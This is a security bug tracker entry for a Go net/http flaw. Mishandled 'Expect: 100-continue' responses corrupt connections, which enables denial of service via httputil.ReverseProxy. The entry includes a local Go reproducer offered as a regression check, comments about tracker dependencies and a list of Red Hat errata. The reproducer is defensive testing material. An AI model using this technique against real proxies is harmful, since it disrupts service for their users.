The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.
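The following Go program is an added example, not part of this tracker or of the Go project's own test suite. It reproduces the scenario the description above outlines from the defender's side: a backend that answers an "Expect: 100-continue" request with a final 417 without ever sending "100 Continue", a stock httputil.ReverseProxy in front of it, and a client that sends the rejected request followed by an ordinary GET. On an affected Go toolchain the follow-up request fails (or comes back as a 502 from the proxy); on a fixed toolchain it returns 200, which makes this a usable regression check for a rebuilt golang. The backend, the paths `/upload` and `/health`, and the body `payload` are all constructed for this example.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strings"
	"time"
)

// NewRejectingBackend starts a backend (constructed for this example) that
// answers any request carrying "Expect: 100-continue" with a final 417
// status without reading the body, so it never emits "100 Continue".
// Every other request gets a plain 200.
func NewRejectingBackend() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Expect") != "" {
			http.Error(w, "expectation failed", http.StatusExpectationFailed)
			return
		}
		io.WriteString(w, "ok")
	}))
}

// NewProxyFor puts a stock httputil.ReverseProxy in front of backendURL. The
// proxy's outbound connections use http.DefaultTransport, whose
// ExpectContinueTimeout of one second makes it wait for "100 Continue"
// before sending the body, which is the code path the description covers.
func NewProxyFor(backendURL string) (*httptest.Server, error) {
	target, err := url.Parse(backendURL)
	if err != nil {
		return nil, err
	}
	return httptest.NewServer(httputil.NewSingleHostReverseProxy(target)), nil
}

// CheckNextRequestAfterRejectedExpect sends an Expect: 100-continue POST that
// the backend rejects with a final status, then sends an ordinary GET to the
// same host and returns the GET's status code. On an affected Go build the
// connection is left in an invalid state and the GET fails (an error here, or
// a 502 when going through the proxy); on a fixed build it returns 200.
func CheckNextRequestAfterRejectedExpect(baseURL string) (int, error) {
	client := &http.Client{
		// Non-zero ExpectContinueTimeout: wait for the interim response
		// instead of sending the body immediately.
		Transport: &http.Transport{ExpectContinueTimeout: time.Second},
		Timeout:   5 * time.Second,
	}
	defer client.CloseIdleConnections()

	req, err := http.NewRequest(http.MethodPost, baseURL+"/upload", strings.NewReader("payload"))
	if err != nil {
		return 0, err
	}
	req.Header.Set("Expect", "100-continue")
	resp, err := client.Do(req)
	if err != nil {
		return 0, fmt.Errorf("expect request: %w", err)
	}
	io.Copy(io.Discard, resp.Body)
	resp.Body.Close()
	if resp.StatusCode != http.StatusExpectationFailed {
		return resp.StatusCode, fmt.Errorf("expect request: got status %d, want 417", resp.StatusCode)
	}

	// With keep-alive this is the next request on the same connection, and
	// it is the one that fails when the previous exchange corrupted it.
	resp2, err := client.Get(baseURL + "/health")
	if err != nil {
		return 0, fmt.Errorf("follow-up request: %w", err)
	}
	defer resp2.Body.Close()
	io.Copy(io.Discard, resp2.Body)
	return resp2.StatusCode, nil
}

func main() {
	backend := NewRejectingBackend()
	defer backend.Close()
	proxy, err := NewProxyFor(backend.URL)
	if err != nil {
		panic(err)
	}
	defer proxy.Close()

	status, err := CheckNextRequestAfterRejectedExpect(proxy.URL)
	fmt.Printf("follow-up request through proxy: status=%d err=%v\n", status, err)
}
```

Running the check against the backend URL directly exercises the client-side bug on its own; running it against the proxy URL exercises the ReverseProxy case from the description, where the corrupted connection is the proxy's connection to the backend and the victim is whichever later request the proxy routes over it.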
Created golang tracking bugs for this issue: Affects: fedora-all [bug 2297318]
There is something wrong with this CVE tracker bug. The CVE is in Go's standard net/http package, which is part of the golang RPM. However, I don't see any mention of golang here. I also don't see any mention of prominent RPMs that use Go and might need to be rebuilt against a golang where the CVE is fixed, e.g., podman and toolbox. However, I do know about the existence of two toolbox Jira issues that were filed for this CVE: https://issues.redhat.com/browse/RHEL-47194 https://issues.redhat.com/browse/RHEL-47199 So, it seems like something went wrong where this tracker bug doesn't depend on all the corresponding child issues and bugs. This isn't just an academic problem, because I use this metadata to figure out the corresponding golang issues to know when the CVE would get fixed in golang, so that builds can be done against it.
(In reply to Debarshi Ray from comment #12)
> There is something wrong with this CVE tracker bug.
>
> The CVE is in Go's standard net/http package, which is part of the golang
> RPM. However, I don't see any mention of golang here. I also don't see any
> mention of prominent RPMs that use Go and might need to be rebuilt against a
> golang where the CVE is fixed, e.g., podman and toolbox. However, I do
> know about the existence of two toolbox Jira issues that were filed for this
> CVE:
> https://issues.redhat.com/browse/RHEL-47194
> https://issues.redhat.com/browse/RHEL-47199

I did some digging, and the corresponding golang bugs are:
https://issues.redhat.com/browse/RHEL-47200
https://issues.redhat.com/browse/RHEL-47161
This issue has been addressed in the following products: Cryostat 3 on RHEL 8 Via RHSA-2024:5537 https://access.redhat.com/errata/RHSA-2024:5537
This issue has been addressed in the following products: Cost Management for RHEL 8 Via RHSA-2024:6462 https://access.redhat.com/errata/RHSA-2024:6462
This issue has been addressed in the following products: Red Hat Enterprise Linux 9.2 Extended Update Support Via RHSA-2024:6914 https://access.redhat.com/errata/RHSA-2024:6914
This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2024:6908 https://access.redhat.com/errata/RHSA-2024:6908
This issue has been addressed in the following products: Red Hat Enterprise Linux 9 Via RHSA-2024:6913 https://access.redhat.com/errata/RHSA-2024:6913
This issue has been addressed in the following products: Red Hat Enterprise Linux 8.8 Extended Update Support Via RHSA-2024:6912 https://access.redhat.com/errata/RHSA-2024:6912
This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2024:6969 https://access.redhat.com/errata/RHSA-2024:6969
This issue has been addressed in the following products: NETWORK-OBSERVABILITY-1.6.0-RHEL-9 Via RHSA-2024:7074 https://access.redhat.com/errata/RHSA-2024:7074
This issue has been addressed in the following products: OpenShift Custom Metrics Autoscaler 2 Via RHSA-2024:7348 https://access.redhat.com/errata/RHSA-2024:7348
This issue has been addressed in the following products: Red Hat Enterprise Linux 8 Via RHSA-2024:7349 https://access.redhat.com/errata/RHSA-2024:7349